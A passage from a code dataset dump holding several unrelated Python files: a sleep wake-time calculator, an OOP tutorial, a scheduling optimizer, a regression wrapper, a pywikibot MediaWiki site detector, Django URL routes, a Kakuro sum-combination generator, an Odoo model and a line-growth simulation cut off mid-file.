+{"seq_id":"279587733","text":"# user enters sleep timing, wants to check wake up timing\n\ndef handle_overflow_minutes(minutes):\n overflow_hour = 0\n if minutes >= 60:\n overflow_hour = 1\n minutes = minutes - 60\n return overflow_hour, minutes\n return overflow_hour, minutes\n\ndef handle_overflow_hours(hours):\n if hours == 24:\n return 0\n if hours >= 24:\n return hours-24\n return hours\n\ndef convert_to_string_len_2(int_value):\n int_str = str(int_value)\n if len(int_str) < 2:\n int_str = '0' + int_str\n return int_str\n else:\n return int_str\n\ndef main_calculation(user_time, rem_sleep_timings):\n sleep_prep_time = 15\n sleep_timings_return = []\n\n user_hours = int(user_time[:2])\n user_minutes = int(user_time[2:])\n\n for time in rem_sleep_timings:\n rem_minutes = int((time - (time//1))*60)\n rem_hours = int(time//1)\n\n # execute add timings\n minutes = user_minutes + rem_minutes + sleep_prep_time\n overflow_hour, minutes = handle_overflow_minutes(minutes)\n hours = user_hours + rem_hours + overflow_hour\n hours = handle_overflow_hours(hours)\n\n str_to_append = convert_to_string_len_2(hours) + convert_to_string_len_2(minutes)\n sleep_timings_return.append(str_to_append)\n\n return sleep_timings_return\n\n# main function execution\ndef sleep_calculator(user_time):\n user_time = user_time.strip()\n rem_sleep_timings = [1.5, 3.0, 4.5, 6.0, 7.5, 9.0, 10.5]\n sleep_timings_list = main_calculation(user_time, rem_sleep_timings)\n return sleep_timings_list\n\nif __name__ == '__main__':\n user_time = input('Enter timing >>> ')\n 
print(sleep_calculator(user_time))","sub_path":"wake.py","file_name":"wake.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"210417645","text":"# Inheritance\nclass User:\n    def log(self):\n        print(self)\n        # without User as a parent, customer.log() would raise AttributeError: 'Customer' object has no attribute 'log'\n\n# Polymorphism \nclass Teacher(User):\n    def log(self):\n        print(\"I'm a teacher\")\n\nclass Customer(User): # initialize the parameters below\n    # Initialize method\n    def __init__(self, name, membership):\n        self.name = name\n        self.membership = membership\n\n    # we're going to make name a property with two methods\n    @property\n    def name(self):\n        return self._name #this is private\n\n    @name.setter\n    def name(self, name):\n        self._name = name\n\n    @name.deleter # this deletes the name attribute from the customer class\n    def name(self):\n        del self._name\n\n    def update_membership(self, new_membership):\n        print(\"Calculating costs\")\n        self.membership = new_membership\n\n    # printing all the customers method with NO SELF\n    def print_all_customers(customers):\n        for customer in customers:\n            print(customer)\n\n    # this method will convert a customer to a string\n    def __str__(self):\n        return self.name + \" \" + self.membership\n\n    # Equals method\n    def __eq__(self, other):\n        if self.name == other.name and self.membership == other.membership:\n            return True\n        \n        return False\n\n    __hash__ = None\n\n    __repr__ = __str__\n\n\n# # create the customer like this\n# jurgen = Customer(\"Jurgen\", \"Premium\")\n# print(jurgen.name, jurgen.membership)\n# # another example of creating a customer\n# caleb = Customer(\"Caleb\", \"Bronze\")\n# print(caleb.name, caleb.membership)\n\n\n# you can create a list of objects of the class. 
The constructor arguments are passed inline\ncustomers = [Customer(\"Jurgen\", \"Premium\"), \n            Customer(\"Caleb\", \"Bronze\"),\n            Teacher()]\n\nprint(customers[1].name) # => Caleb\n\n# Custom Methods\n# customers[1].verified = False\n# print(customers[1].verified) # => False\n\n# Use Custom Method to update the membership\n# print(customers[1].membership) # => Bronze\n# customers[1].update_membership(\"Gold\")\n# print(customers[1].membership) # => Gold \n\n# convert customer to string\nprint(customers[1]) # Caleb Bronze\ncustomers[1].update_membership(\"Gold\")\nprint(customers[1]) # => Caleb Gold\n\n#Print all of the customers\nCustomer.print_all_customers(customers)\n# => Jurgen Premium\n# Caleb Gold\n# (plus the Teacher object's default repr)\n\n# Equals\nprint(customers[0] == customers[1]) # False\n\nprint(customers) # => [Jurgen Premium, Caleb Gold, plus the Teacher object's default repr]\n\n# Encapsulation - The whole idea behind it is you can hide the inner details of a class or certain data.\n# and you only need to share or expose what is needed for the user of the class to use this class\n\n# Inheritance - Allows us to have certain attributes for objects because they're defined in a base class\n\n# Polymorphism - It's the same thing as inheritance except special abilities/methods can be added to each individual object\n\ncustomers[0].log() # => Jurgen Premium\n\ncustomers[2].log()\n\nusers = [Customer(\"Jurgen\", \"Premium\"),\n         Customer(\"Caleb\", \"Bronze\"),\n         Teacher()]\n\n# loop the log for each user in the array of users\nfor user in users:\n    user.log()","sub_path":"python-oop.py","file_name":"python-oop.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"33663","text":"import numpy as np\nimport pandas as pd\nimport random as rd\nimport copy\nimport matplotlib.pyplot as plt\nimport sys\n\nfam = np.asarray(pd.read_csv('family_data.csv').values)\n\nn_days = 100\nmax_occupancy = 300\nmin_occupancy = 125\ndays = np.arange(n_days) + 1\npenalty_const = [0,50,50,100,200,200,300,300,400,500,500]\npenalty_term1 = [0,0,9,9,9,18,18,36,36,235,434]\n\ndef cost(schedule):\n    penalty, occupancy, day_cost = 0, {k: 0 for k in days}, {k: 0 for k in days}\n    fam_prefs = {}\n    fam_costs = []\n\n    for assignment in schedule:\n        family, day = assignment[0], assignment[1]\n\n        choices = fam[fam[:,0] == family][0]\n        choices2, n_members = choices[1:-1], choices[-1]\n        if family not in fam_prefs.keys():\n            fam_prefs[family] = {'n_members': n_members, 'choices': choices2}\n        pref = np.where(choices2 == day)\n        pref = 10 if len(pref[0]) == 0 else pref[0][0]\n        penalty = penalty + penalty_const[pref] + n_members*penalty_term1[pref]\n        occupancy[day] += n_members\n        day_cost[day] += penalty_const[pref] + n_members*penalty_term1[pref]\n        fam_costs.append((family, penalty))\n\n    for i in days:\n        if occupancy[i] > max_occupancy or (occupancy[i] < min_occupancy):\n            penalty += 10000000000000\n\n    accounting_cost = (occupancy[n_days] - min_occupancy) / 400.0 * occupancy[n_days]**0.5\n    day_cost[n_days] += (occupancy[n_days] - min_occupancy) / 400.0 * occupancy[n_days]**0.5\n    accounting_cost = max(0, accounting_cost)\n    for i in range(len(days) - 1, 0, -1):  # walk the days backwards for the accounting cost\n        accounting_cost += (occupancy[i] - min_occupancy) / 400.0 * occupancy[i]**(0.5 + np.sqrt( (occupancy[i] - occupancy[i+1])**2))\n        day_cost[i] += (occupancy[i] - min_occupancy) / 400.0 * occupancy[i]**(0.5 + np.sqrt( (occupancy[i] - occupancy[i+1])**2))\n\n    penalty += accounting_cost\n    return penalty, np.asarray(fam_costs), occupancy, fam_prefs, day_cost\n\ndef make_guess(schedule, 
fc):\n fam_day_costs = np.hstack((schedule, fc[:,1:]))\n fam_day_costs.view('i8,i8,i8').sort(order=['f2'], axis=0)\n return fam_day_costs[::-1]\n\ndef make_sched():\n bymems = []\n for i in fam_prefs.keys():\n cv = [i]\n cv.append(fam_prefs[i]['n_members'])\n bymems.append(cv)\n bymems = np.array(bymems)\n bymems.view('i8,i8').sort(order=['f1','f0'], axis=0)\n bymems = bymems[::-1]\n\n occ = {k:0 for k in days}\n\n sched = []\n not_scheduled = []\n for i in range(bymems.shape[0]):\n found = 0\n for j in range(len(fam_prefs[bymems[i][0]]['choices'])):\n if (occ[fam_prefs[bymems[i][0]]['choices'][j]] < max_occupancy - bymems[i][1]) and found == 0:\n sched.append([bymems[i][0], fam_prefs[bymems[i][0]]['choices'][j]])\n found = 1\n occ[fam_prefs[bymems[i][0]]['choices'][j]] += bymems[i][1]\n if found == 0:\n not_scheduled.append(i)\n\n for i in not_scheduled:\n scheduled = 0\n for key in occ.keys():\n if occ[key] < max_occupancy - bymems[i][1] and occ[key] + bymems[i][1] >= min_occupancy and scheduled == 0:\n sched.append([bymems[i][0], key])\n occ[key] += bymems[i][1]\n scheduled = 1\n return np.asarray(sched)\n\ninit = [[j, rd.randint(1,n_days)] for j in range(len(fam))]\ntotal_cost, fam_costs, occ, fam_prefs, day_costs = cost(init)\n#start = make_sched()\nstart = np.asarray(init)\ntotal_cost, fam_costs, occ, fam_prefs, day_costs = cost(start)\nday_costs = np.asarray([[m,day_costs[m]] for m in day_costs.keys()])\nday_costs.view('i8,i8').sort(order=['f1'], axis=0)\nday_costs = day_costs[::-1]\n\nprint(total_cost)\ntotal_cost2 = 100000000000000000\nfor i in range(100):\n not_scheduled = []\n temp = start.copy()\n\n\n for j in range(10):\n occ[day_costs[j,0]] = 0\n occ[day_costs[j,0]] = 0\n occ[day_costs[j,0]] = 0\n for j in range(10):\n fams_toberescheduled = temp[temp[:,1] == day_costs[j,0]][:,0]\n for k in range(fams_toberescheduled.shape[0]):\n found = 0\n try:\n fam_prefs[fams_toberescheduled[k]]['choices'].remove(day_costs[j,0])\n except:\n pass\n for l in range(len(fam_prefs[fams_toberescheduled[k]]['choices'])):\n if found == 0 and (occ[fam_prefs[fams_toberescheduled[k]]['choices'][l]] < max_occupancy - fam_prefs[fams_toberescheduled[k]]['n_members']) and (occ[fam_prefs[fams_toberescheduled[k]]['choices'][l]] > min_occupancy) and (fam_prefs[fams_toberescheduled[k]]['choices'][l] != day_costs[j,0]):\n found = 1\n temp[temp[:,0] == fams_toberescheduled[k]][0] = fam_prefs[fams_toberescheduled[k]]['choices'][l]\n occ[fam_prefs[fams_toberescheduled[k]]['choices'][l]] += fam_prefs[fams_toberescheduled[k]]['n_members']\n if found == 0:\n not_scheduled.append(fams_toberescheduled[k])\n for familia in not_scheduled:\n found= 0\n for dia in occ.keys():\n if dia != day_costs[j,0] and found ==0 and occ[dia] > min_occupancy and occ[dia] < max_occupancy - fam_prefs[familia]['n_members']:\n occ[dia] += fam_prefs[familia]['n_members']\n found = 1\n temp[temp[:,0] == fams_toberescheduled[k]][0] = dia\n if found == 0:\n for dia in occ.keys():\n if dia != day_costs[j,0] and found ==0 and occ[dia] < max_occupancy - fam_prefs[familia]['n_members']:\n occ[dia] += fam_prefs[familia]['n_members']\n found = 1\n temp[temp[:,0] == fams_toberescheduled[k]][0] = dia\n total_cost2, fam_costs2, occ2, fam_prefs2, day_cost2 = cost(temp)\n print(total_cost2)\n if total_cost <= total_cost2:\n total_cost = total_cost2\n occ = occ2\n fam_costs = fam_costs2\n #fam_prefs = fam_prefs2\n day_costs = day_cost2\n day_costs = np.asarray([[m,day_costs[m]] for m in day_costs.keys()])\n day_costs.view('i8,i8').sort(order=['f1'], 
axis=0)\n        day_costs = day_costs[::-1]\n        start=temp\n    print(sum(start - temp))\n\n\nsched = np.asarray(start, dtype=int)\nf = open('sub.csv', 'w')\nf.write('family_id,assigned_day\\n')\nfor i in range(len(sched)):\n    f.write('{},{}\\n'.format(int(sched[i][0]), int(sched[i][1])))\nf.close()\n","sub_path":"sgd_elf.py","file_name":"sgd_elf.py","file_ext":"py","file_size_in_byte":6355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"100923333","text":"from sklearn.ensemble import RandomForestRegressor, AdaBoostRegressor\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom xgboost import XGBRegressor\r\nfrom catboost import CatBoostRegressor\r\nimport sklearn\r\nfrom sklearn.metrics import *\r\nfrom category_encoders import TargetEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom onepiecepredictor.OnePiecePredictor2 import OnePiecePredictor3\r\n\r\nclass OnePieceRegression(OnePiecePredictor3):\r\n    \"\"\"\r\n    For hyper parameter tuning with cross validation and stratified splitting of data if required.\r\n\r\n    X -> array-like(supported by Sklearn). If testTrainSplit is passed, this will be split into train and test\r\n    Y -> array-like(supported by Sklearn). If testTrainSplit is passed, this will be split into train and test\r\n    model -> string Currently supported models: LINEAR,RF,SVM,KNN,ADABOOST,XGBOOST,CATBOOST\r\n    testX -> array-like(supported by Sklearn), test data. Ignored if testTrainSplit is passed\r\n    testY -> array-like(supported by Sklearn), test data. Ignored if testTrainSplit is passed\r\n    testTrainSplit -> float, ratio passed will be the amount of test data.\r\n    hyperParams -> dictionary, Hyper parameters specific to the model passed. If passed CV is performed.\r\n    performCV -> bool, Used when hyperParams not passed to perform plain CV.\r\n    folds -> int, No of folds to be used for CV.\r\n    scoring -> str, Evaluation metric. Currently supported values: r2,neg_mean_squared_error. If not passed r2 is used.\r\n    targetEncodeCols -> List. 
List of columns to target encode.\r\n    modelParams -> dictionary, Any model specific parameters can be passed as dictionary.\r\n\r\n    \"\"\"\r\n\r\n    def __init__(self, X, Y, model, modelParams = None, testX = None, testY = None,testTrainSplit = None,\r\n                 folds = 5, hyperParams = None,scoring = None, performCV = None, targetEncodeCols = None):\r\n        if (modelParams is None):\r\n            modelParams = {}\r\n        super().__init__(\r\n            X = X, Y = Y, model=model,modelParams = modelParams,testX=testX, testY=testY, testTrainSplit=testTrainSplit,\r\n            folds=folds, hyperParams=hyperParams,scoring=scoring, performCV=performCV, targetEncodeCols = targetEncodeCols,\r\n        )\r\n        self.scoreToFuncDict = self.__getScoreToFuncDict()\r\n        if(not self.scoring):\r\n            self.scoring = 'r2'\r\n\r\n\r\n    def getTestTrainSlipt(self):\r\n        ## If both testX and testTrainSplit are not passed throw exception.\r\n        if ((self.testX is None) and (self.testTrainSplit is None)):\r\n            raise Exception(\"Please pass testX or testTrainSplit\")\r\n\r\n        if (self.targetEncodeCols):\r\n            for col in self.targetEncodeCols:\r\n                encoder = TargetEncoder()\r\n                # TargetEncoder needs the target to fit; test data is only transformed\r\n                self.X[col] = encoder.fit_transform(self.X[col], self.Y)\r\n                if (self.testX is not None):\r\n                    self.testX[col] = encoder.transform(self.testX[col])\r\n\r\n        if(self.testTrainSplit):\r\n            X_train, X_test, y_train, y_test = train_test_split(self.X, self.Y, test_size=self.testTrainSplit, random_state=7)\r\n            return X_train, X_test, y_train, y_test\r\n        else:\r\n            return self.X, self.testX, self.Y, self.testY\r\n\r\n\r\n    def fit(self):\r\n        super().fit()\r\n\r\n    def test(self):\r\n        super().test()\r\n\r\n    def predict(self):\r\n        \"\"\"\r\n        Returns score and predictions.\r\n        \"\"\"\r\n        if (self.testY is None):\r\n            return 0, self.test()\r\n\r\n        preds = self.bestEstimator.predict(self.testX)\r\n        res = getattr(sklearn.metrics, self.scoreToFuncDict[self.scoring])(self.testY, preds)\r\n        print(self.model, self.scoring, res)\r\n        return res, preds\r\n\r\n    def newDataPredict(self, testData):\r\n        super().newDataPredict(testData)\r\n\r\n    def getEstimatorModel(self):\r\n\r\n        modelToClassMapper = {\r\n            \"LINEAR\" : LinearRegression(),\r\n            \"RF\" : RandomForestRegressor(),\r\n            \"SVM\" : SVR(),\r\n            \"KNN\" : KNeighborsRegressor(),\r\n            \"ADABOOST\" : AdaBoostRegressor(),\r\n            \"XGBOOST\" : XGBRegressor(),\r\n            \"CATBOOST\" : CatBoostRegressor(),\r\n        }\r\n\r\n        if(self.model not in modelToClassMapper):\r\n            raise Exception(\"Please pass a valid model from: LINEAR,RF,SVM,KNN,ADABOOST,XGBOOST,CATBOOST\")\r\n        else:\r\n            cls = modelToClassMapper[self.model]\r\n            if ((self.model == \"CATBOOST\") and ('logging_level' not in self.modelParams)):\r\n                self.modelParams['logging_level'] = 'Silent'\r\n\r\n            return cls.set_params(**self.modelParams)\r\n\r\n    def __getScoreToFuncDict(self):\r\n\r\n        scoreToFuncDict = {\r\n            \"r2\": 'r2_score',\r\n            \"neg_mean_squared_error\" : 'mean_squared_error'\r\n        }\r\n\r\n        return scoreToFuncDict\r\n\r\n\r\n","sub_path":"OnePiecePredictor/OnePieceRegression.py","file_name":"OnePieceRegression.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"342386941","text":"# -*- coding: utf-8 -*-\n\"\"\"Classes for detecting a MediaWiki site.\"\"\"\n#\n# (C) Pywikibot team, 2010-2015\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import unicode_literals\n\n__version__ = '$Id$'\n#\n\nimport json\nimport re\nimport sys\n\nfrom collections import defaultdict\nfrom distutils.version import LooseVersion as V\n\nfrom pywikibot.tools 
import PY2, PYTHON_VERSION\n\nif not PY2:\n from html.parser import HTMLParser\n from urllib.parse import urljoin\n from urllib.error import HTTPError\n import urllib.request as urllib2\nelse:\n from HTMLParser import HTMLParser\n from urlparse import urljoin\n from urllib2 import HTTPError\n import urllib2\n\n\ndef urlopen(url):\n req = urllib2.Request(\n url,\n headers={'User-agent': 'Pywikibot Family File Generator 2.0'\n ' - https://www.mediawiki.org/wiki/Pywikibot'})\n uo = urllib2.urlopen(req)\n try:\n if sys.version_info[0] > 2:\n uo.charset = uo.headers.get_content_charset()\n else:\n uo.charset = uo.headers.getfirstmatchingheader('Content-Type')[0].strip().split('charset=')[1]\n except IndexError:\n uo.charset = 'latin-1'\n return uo\n\n\nclass MWSite(object):\n\n \"\"\"Minimal wiki site class.\"\"\"\n\n REwgEnableApi = re.compile(r'wgEnableAPI ?= ?true')\n REwgServer = re.compile(r'wgServer ?= ?\"([^\"]*)\"')\n REwgScriptPath = re.compile(r'wgScriptPath ?= ?\"([^\"]*)\"')\n REwgArticlePath = re.compile(r'wgArticlePath ?= ?\"([^\"]*)\"')\n REwgContentLanguage = re.compile(r'wgContentLanguage ?= ?\"([^\"]*)\"')\n REwgVersion = re.compile(r'wgVersion ?= ?\"([^\"]*)\"')\n\n def __init__(self, fromurl):\n self.fromurl = fromurl\n if fromurl.endswith(\"$1\"):\n fromurl = fromurl[:-2]\n try:\n uo = urlopen(fromurl)\n data = uo.read().decode(uo.charset)\n except HTTPError as e:\n if e.code != 404:\n raise\n data = e.read().decode('latin-1') # don't care about mojibake for errors\n pass\n\n wp = WikiHTMLPageParser()\n wp.feed(data)\n try:\n self.version = wp.generator.replace(\"MediaWiki \", \"\")\n except Exception:\n self.version = \"0.0\"\n\n if V(self.version) < V(\"1.17.0\"):\n self._parse_pre_117(data)\n else:\n self._parse_post_117(wp, fromurl)\n\n @property\n def langs(self):\n data = urlopen(\n self.api +\n \"?action=query&meta=siteinfo&siprop=interwikimap&sifilteriw=local&format=json\")\n iw = json.loads(data.read().decode(data.charset))\n if 'error' in iw:\n raise RuntimeError('%s - %s' % (iw['error']['code'],\n iw['error']['info']))\n self.langs = [wiki for wiki in iw['query']['interwikimap']\n if u'language' in wiki]\n return self.langs\n\n def _parse_pre_117(self, data):\n if not self.REwgEnableApi.search(data):\n print(\"*** WARNING: Api does not seem to be enabled on %s\"\n % self.fromurl)\n try:\n self.version = self.REwgVersion.search(data).groups()[0]\n except AttributeError:\n self.version = None\n\n self.server = self.REwgServer.search(data).groups()[0]\n self.scriptpath = self.REwgScriptPath.search(data).groups()[0]\n self.articlepath = self.REwgArticlePath.search(data).groups()[0]\n self.lang = self.REwgContentLanguage.search(data).groups()[0]\n\n if self.version is None:\n # try to get version using api\n try:\n d = json.load(urlopen(self.api + \"?version&format=json\"))\n self.version = filter(\n lambda x: x.startswith(\"MediaWiki\"),\n [l.strip()\n for l in d['error']['*'].split(\"\\n\")])[0].split()[1]\n except Exception:\n pass\n\n def _parse_post_117(self, wp, fromurl):\n apipath = wp.edituri.split(\"?\")[0]\n fullurl = urljoin(fromurl, apipath)\n data = urlopen(fullurl + \"?action=query&meta=siteinfo&format=json\")\n info = json.loads(data.read().decode(data.charset))['query']['general']\n self.server = urljoin(fromurl, info['server'])\n for item in ['scriptpath', 'articlepath', 'lang']:\n setattr(self, item, info[item])\n\n def __cmp__(self, other):\n return (self.server + self.scriptpath ==\n other.server + other.scriptpath)\n\n def __hash__(self):\n return 
hash(self.server + self.scriptpath)\n\n    @property\n    def api(self):\n        return self.server + self.scriptpath + \"/api.php\"\n\n    @property\n    def iwpath(self):\n        return self.server + self.articlepath\n\n\nclass WikiHTMLPageParser(HTMLParser):\n\n    \"\"\"Wiki HTML page parser.\"\"\"\n\n    def __init__(self):\n        if PYTHON_VERSION < (3, 4):\n            HTMLParser.__init__(self)\n        else:\n            super().__init__(convert_charrefs=True)\n        self.generator = None\n\n    def handle_starttag(self, tag, attrs):\n        attrs = defaultdict(lambda: None, attrs)\n        if tag == \"meta\":\n            if attrs[\"name\"] == \"generator\":\n                self.generator = attrs[\"content\"]\n        if tag == \"link\":\n            if attrs[\"rel\"] == \"EditURI\":\n                self.edituri = attrs[\"href\"]\n","sub_path":"pywikibot/site_detect.py","file_name":"site_detect.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"135679968","text":"from django.conf import urls\nfrom rest_framework import urlpatterns as up\nfrom rest_framework import renderers\nfrom trails import views\n\n\nsign_list = views.SignViewSet.as_view({\n    'get': 'list',\n    'post': 'create'\n})\n\nsign_detail = views.SignViewSet.as_view({\n    'get': 'retrieve',\n    'put': 'update',\n    'delete': 'destroy'\n})\n\ncamp_list = views.CampViewSet.as_view({\n    'get': 'list',\n    'post': 'create'\n})\n\ncamp_detail = views.CampViewSet.as_view({\n    'get': 'retrieve',\n    'put': 'update',\n    'delete': 'destroy'\n})\n\nurlpatterns = [\n    urls.url(r'^$',\n             views.TrailsInfo.as_view(),\n             name='trails-info'),\n    urls.url(r'^signs$',\n             sign_list,\n             name='signs-list'),\n    urls.url(r'^signs/(?P<pk>[0-9a-z-]{36})$',\n             sign_detail,\n             name='signs-detail'),\n    urls.url(r'^camps$',\n             camp_list,\n             name='camps-list'),\n    urls.url(r'^camps/(?P<pk>[0-9a-z-]{36})$',\n             camp_detail,\n             name='camps-detail'),\n]\n\nurlpatterns = up.format_suffix_patterns(urlpatterns)\n","sub_path":"wire_hobo/trails/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"169139358","text":"#------------------------------------------------------------------------------------------------#\n#\n# The dictionary that we create here, is a dictionary that has for keys all the possible sums\n# that can be created by the summation of all the combinations* of numbers in [1, MAX_NUMBER].\n# *In these combinations, a number can occur only once.\n#\n\n\nMAX_NUMBER = 9 # max number that can participate in the sum\nsumcombo = dict()\n\ndef createSumComboFile():\n    \n    min_possible_sum = 1\n    max_possible_sum = sum([i for i in range(1, MAX_NUMBER + 1)])\n    \n    # For each possible sum, it adds it as an entry-key to the dictionary `sumcombo`.\n    # \n    for i in range(min_possible_sum, max_possible_sum + 1):\n        sumcombo[i] = list()\n    \n    # For each possible number of summands in a combination\n    #\n    for number_of_variables in range(1, MAX_NUMBER + 1):\n        recursion(1, 1, [0 for i in range(number_of_variables)])\n\n    # The dictionary is filled, and now, we can write it to a file ;)\n    #\n    f = open('sumcombo.py', 'w')\n    write_dictionary(f, sumcombo)\n    f.close()\n\n\n# 1st argument: which is the current variable that we set.\n# 2nd argument: which is the minimum value that `var` can take.\n# 3rd argument: a list that temporarily holds the combos of `len(LIST)` variables.\n# \ndef recursion(var, minval, LIST):\n    if var > len(LIST): #> If we reached the end of `LIST` (means `LIST` is filled with values):\n        
sumcombo[sum(LIST)].append(LIST[:]) #> we add this sum combination to the dictionary.\n return\n to = MAX_NUMBER - (len(LIST) - var)\n for i in range(minval, to+1):\n LIST[var-1] = i\n recursion(var+1, i+1, LIST)\n\n\n\n\n\n\ndef write_dictionary(f, D):\n f.write('# The dictionary `sumcombo` contains for each , all the combinations that\\n'\\\n '# can occur by numbers from 1 to {0} that sum to and every number appears\\n'\\\n '# in the combination only (at most) once.\\n#\\n'.format(MAX_NUMBER))\n \n f.write('sumcombo = {')\n keys = D.keys()\n f.write('\\\\\\n{0}: '.format(keys[0]))\n write_tuple(f, D[keys[0]])\n for i in range(1, len(keys)):\n f.write(',\\\\\\n{0}: '.format(keys[i]))\n write_tuple(f, D[keys[i]])\n f.write('\\\\\\n}\\n')\n\ndef write_tuple(f, L):\n f.write('(')\n write_frozenset(f, L[0])\n if len(L) == 1: # Because tuples with one element, must be written as `(elem1,)`\n f.write(',') # to be read as tuples, eg. \"(1) is read `1`\", \"(1,) is read `(1)`\"\n for i in range(1, len(L)):\n f.write(', ')\n write_frozenset(f, L[i])\n f.write(')')\n\ndef write_frozenset(f, L):\n f.write('frozenset([{0}'.format(L[0]))\n for i in range(1, len(L)):\n f.write(', {0}'.format(L[i]))\n f.write('])')\n\n\n\n\n\nif __name__ == \"__main__\":\n createSumComboFile()\n\n\n\n\n\n\n\n\n","sub_path":"(2011) Artificial Intelligence/kakuro [python]/create_file_sumcombo.py","file_name":"create_file_sumcombo.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"169139358","text":"# -*- encoding:utf-8 -*-\nfrom odoo import api\nfrom odoo import fields, models\n\n\nclass PregnantCycle(models.Model):\n _name = 'his.pregnant_cycle'\n _description = '孕周'\n update_external = True # 更新外部服务器数据\n\n @api.model\n def _default_get_value(self):\n cycle = self.search([], order='value desc', limit=1)\n if cycle:\n return cycle.value + 1\n\n return 1\n\n name = fields.Char('名称')\n value = fields.Integer('距怀孕周数', default=_default_get_value)\n\n\n _sql_constraints = [\n ('value_uniq', 'unique (value)', '怀孕周数重复')\n ]\n\n @api.onchange('value')\n def onchange_value(self):\n if self.value < 1:\n return {\n 'warning': {\n 'title': '距怀孕周数错误',\n 'message': \"距怀孕周数必须大于等于1\"\n }\n }\n\n self.name = u'第%d周' % self.value\n\n\n","sub_path":"his_pregnant/models/pregnant_cycle.py","file_name":"pregnant_cycle.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"272076471","text":"import math\nimport random\nfrom collections import namedtuple\n\nfrom numba import jit\n\nfrom dan.lib.helper import Vec3\n\n_node_id = 0\n\n# TODO: nested rings?\n\nclass NodeData:\n def __init__(self, node):\n self.pos = Vec3(node.pos)\n self.id = node.id\n self.prev = node.prev.id\n self.next = node.next.id\n\n # This is a helper field for trianglulation\n self.opposite = None\n\n@jit(nopython=True)\ndef numba_push(ax, ay, bx, by, max_dist, scalar):\n dx = ax - bx\n dy = ay - by\n \n d2 = (dx*dx) + (dy*dy)\n\n if d2 > max_dist ** 2:\n return (0, 0)\n\n d = math.sqrt(d2)\n dxn = dx / d\n dyn = dy / d\n\n mag = ((1 / (d*d)) * scalar)\n return (dxn * mag, dyn * mag)\n\nclass Node:\n NEIGHBOR_DISTANCE = 3\n NEIGHBOR_PUSH_SCALAR = 0.05\n OTHER_PUSH_SCALAR = 8\n OTHER_RING_PUSH_SCALAR = 3\n MAX_DIST_OTHER = NEIGHBOR_DISTANCE * 5\n\n def __init__(self, x, y, ring_index):\n global _node_id\n self.pos = Vec3(x, y)\n self.pos_next = Vec3(self.pos)\n self.prev = None\n 
self.next = None\n self.ring_index = ring_index\n\n self.id = _node_id\n _node_id += 1\n\n def set_prev(self, node):\n if self.prev != node:\n self.prev = node\n node.set_next(self)\n\n def set_next(self, node):\n if self.next != node:\n self.next = node\n node.set_prev(self)\n\n def update(self, rings):\n # Maintain distance from neighbors\n self.pos_next.set(self.pos)\n\n self.neighbor_push(self.prev)\n self.neighbor_push(self.next)\n\n for ring_index, nodes in enumerate(rings):\n if self.ring_index == ring_index:\n scalar = Node.OTHER_PUSH_SCALAR\n else:\n scalar = Node.OTHER_RING_PUSH_SCALAR\n for node in nodes:\n if node in (self.next, self.prev, self):\n continue\n\n self.other_push(node, scalar)\n \n\n def other_push(self, node, scalar):\n dx, dy = numba_push(self.pos.x, self.pos.y, node.pos.x, node.pos.y, self.MAX_DIST_OTHER, scalar)\n self.pos_next.x += dx\n self.pos_next.y += dy\n\n # vec = self.pos - node.pos\n # distance2 = vec.length2()\n\n # if distance2 > self.MAX_DIST_OTHER ** 2:\n # return\n\n # distance = math.sqrt(distance2)\n # vec_norm = Vec3(vec)\n # vec_norm /= distance\n\n # push_force = vec_norm * ((1 / (distance*distance)) * scalar)\n\n # self.pos_next += push_force\n\n def neighbor_push(self, node):\n vec = self.pos - node.pos\n distance = vec.length()\n vec_norm = Vec3(vec)\n vec_norm /= distance\n\n distance_from_optimal = distance - self.NEIGHBOR_DISTANCE\n push_force = vec_norm * (distance_from_optimal * self.NEIGHBOR_PUSH_SCALAR)\n push_force *= -1\n\n self.pos_next += push_force\n\n def __repr__(self):\n return \"\".format(\n self.id, self.prev.id, self.next.id\n )\n\nRingDefinition = namedtuple('RingDefinition', ['radius', 'growth_rate'])\n\nclass DiffLine:\n def __init__(self):\n self.roots = []\n self.rings = []\n random.seed(0)\n\n def init_circle(self):\n self.ring_defs = [\n RingDefinition(4, .9),\n RingDefinition(8, .5),\n ]\n\n for ring_index, ring_def in enumerate(self.ring_defs):\n num_points = math.floor((ring_def.radius * math.pi * 2) / Node.NEIGHBOR_DISTANCE)\n\n root = Node(ring_def.radius, 0, ring_index)\n self.roots.append(root)\n nodes = []\n nodes.append(root)\n previous = root\n for i in range(1, num_points):\n a = (i / num_points) * math.pi * 2\n node = Node(math.cos(a) * ring_def.radius, math.sin(a) * ring_def.radius, ring_index)\n nodes.append(node)\n previous.set_next(node)\n previous = node\n previous.set_next(root)\n self.rings.append(nodes)\n\n def insert_node(self):\n for ring_index, nodes in enumerate(self.rings):\n ring_def = self.ring_defs[ring_index]\n if random.random() < ring_def.growth_rate:\n insert_index = random.randint(1, len(nodes) - 1)\n prev = nodes[insert_index]\n next = prev.next\n\n node = Node((prev.pos.x + next.pos.x) * 0.5, (prev.pos.y + next.pos.y) * 0.5, ring_index)\n nodes.insert(insert_index + 1, node)\n prev.set_next(node)\n next.set_prev(node)\n\n def update(self):\n self.insert_node()\n\n # for i, node in enumerate(self.nodes):\n # if self.nodes[(i + 1) % len(self.nodes)] != node.next:\n # raise Exception\n\n for nodes in 